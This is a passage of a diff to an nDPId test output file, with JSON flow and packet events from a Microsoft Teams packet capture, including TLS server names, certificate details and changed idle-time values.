{"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1814,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1587041685261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685261,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0jN1AAG0Ge5k0cg8twKgBBgG77IfA1AaRAv0Ol4AS\/\/+iigAAAgQFoAEDAwgBAQQC"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1815,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1587041685261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685261,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGNYPAqAEGNHIPLeyHAbsC\/Q6XwNQGklAQIADDSQAA"} +00990{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1816,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685106,"flow_last_seen":1587041685262,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041685262,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1824,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685240,"flow_last_seen":1587041685269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6122,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1587041685269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1828,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1587041685278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685278,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8aa1AAGwGYc00ck0hwKgBBgG77IgacWa+co2TlKASIABIJQAAAgQFoAEDAwgEAggKYR7cGTCEuUo="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1829,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1587041685278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685278,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyIAbtyjZOUGnFmv4AQEAmGrAAAAQEICjCEuXNhHtwZ"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1830,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685232,"flow_last_seen":1587041685278,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1587041685280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685280,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VD9AAGwGx0kofgkHwKgBBgG77IwJMzAcxeiHxqASIADLBQAAAgQFoAEDAwgEAggKUkq4VzCEuV0="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1587041685280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685280,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR5HAqAEGKH4JB+yMAbvF6IfGCTMwHYAQEAkJnwAAAQEICjCEuXRSSrhX"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1835,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685251,"flow_last_seen":1587041685281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685281,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1587041685294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685294,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VA1AAGwGd200ck0hwKgBBgG77IvHJo2qMLP5JqASIAAqDQAAAgQFoAEDAwgEAggKYR8CxDCEuVo="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1587041685294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyLAbsws\/kmxyaNq4AQEAlolwAAAQEICjCEuYBhHwLE"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1843,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685248,"flow_last_seen":1587041685294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041685294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1864,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041685232,"flow_last_seen":1587041685327,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041685327,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1874,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685248,"flow_last_seen":1587041685350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6269,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1587041685350,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1897,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041685406} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":1897,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041685403,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -01378{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1908,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685106,"flow_last_seen":1587041685420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6165,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1587041685420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","server_names":"*.trouter.teams.microsoft.com,go.trouter.io,*.drip.trouter.io,*.dc.trouter.io","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 2","subjectDN":"CN=*.trouter.teams.microsoft.com","fingerprint":"DD:24:DF:0E:F3:63:CC:10:B5:03:CF:34:EB:A5:14:8B:97:90:9B:D4"}} +01378{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1908,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685106,"flow_last_seen":1587041685420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6165,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1587041685420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","server_names":"*.trouter.teams.microsoft.com,go.trouter.io,*.drip.trouter.io,*.dc.trouter.io","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 2","subjectDN":"CN=*.trouter.teams.microsoft.com","fingerprint":"DD:24:DF:0E:F3:63:CC:10:B5:03:CF:34:EB:A5:14:8B:97:90:9B:D4"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1979,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041685611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1979,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041685546,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685984,"flow_last_seen":1587041685984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685984,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1587041685984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685984,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyNAbtKVk3bAAAAALAC\/\/8LQAAAAgQFtAEDAwUBAQgKMIS8GgAAAAAEAgAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2019,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1587041685996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685996,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0TQBAAHUGACA0ccKEwKgBBgG77I3LqgPISlZN3IAS\/\/9gggAAAgQFoAEDAwgBAQQC"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2020,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1587041685996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685996,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOyNAbtKVk3cy6oDyVAQIACBQQAA"} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2021,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685984,"flow_last_seen":1587041685997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041685997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01288{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2029,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685984,"flow_last_seen":1587041686010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6191,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1587041686010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2043,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686239,"flow_last_seen":1587041686239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041686239,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2043,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1587041686239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041686239,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyPAbtgh2e9AAAAALAC\/\/9PlwAAAgQFtAEDAwUBAQgKMIS9EAAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1587041686288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041686288,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8YwZAAGwGaHQ0ck0hwKgBBgG77I9T9FE0YIdnvqASIADemAAAAgQFoAEDAwgEAggKYR9buzCEvRA="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1587041686288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041686288,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyPAbtgh2e+U\/RRNYAQEAkdGQAAAQEICjCEvUBhH1u7"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686239,"flow_last_seen":1587041686288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041686288,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2074,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041686239,"flow_last_seen":1587041686542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1587041686542,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685984,"flow_last_seen":1587041685984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685984,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1587041685984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685984,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyNAbtKVk3bAAAAALAC\/\/8LQAAAAgQFtAEDAwUBAQgKMIS8GgAAAAAEAgAA"} 